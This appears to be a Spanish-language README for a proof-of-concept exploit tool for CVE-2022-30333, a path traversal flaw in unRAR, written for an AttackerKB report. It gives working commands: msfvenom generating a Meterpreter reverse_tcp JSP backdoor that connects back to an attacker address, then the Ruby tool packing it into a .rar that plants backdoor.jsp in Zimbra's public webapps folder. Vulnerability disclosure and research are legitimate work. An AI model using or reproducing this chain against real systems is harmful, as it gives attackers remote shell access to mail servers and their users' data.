
Genera archivos RAR maliciosos que explotan una vulnerabilidad de path traversal en unRAR para colocar archivos en ubicaciones arbitrarias, demostrado con una puerta trasera de Zimbra.
Una prueba de concepto para CVE-2022-30333 - una vulnerabilidad de path traversal en versiones de unRAR anteriores a la 6.11. Creé esto como una demostración del exploit para un informe de AttackerKB, ¡y espero incorporarlo pronto en un Módulo de Metasploit!
Básicamente, proporcionas un objetivo (incluyendo path traversal) y algunos datos de archivo, y esta herramienta generará un .rar que extraerá ese archivo en esa ubicación. La longitud máxima del archivo es de 104 bytes, y la longitud máxima del archivo es de 4096 bytes. (Eso no es intrínseco a la vulnerabilidad, es solo lo que elegí cuando generé el archivo).
Por ejemplo, genera un backdoor con msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Luego crea un archivo .rar, plantando el .jsp en algún lugar divertido:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar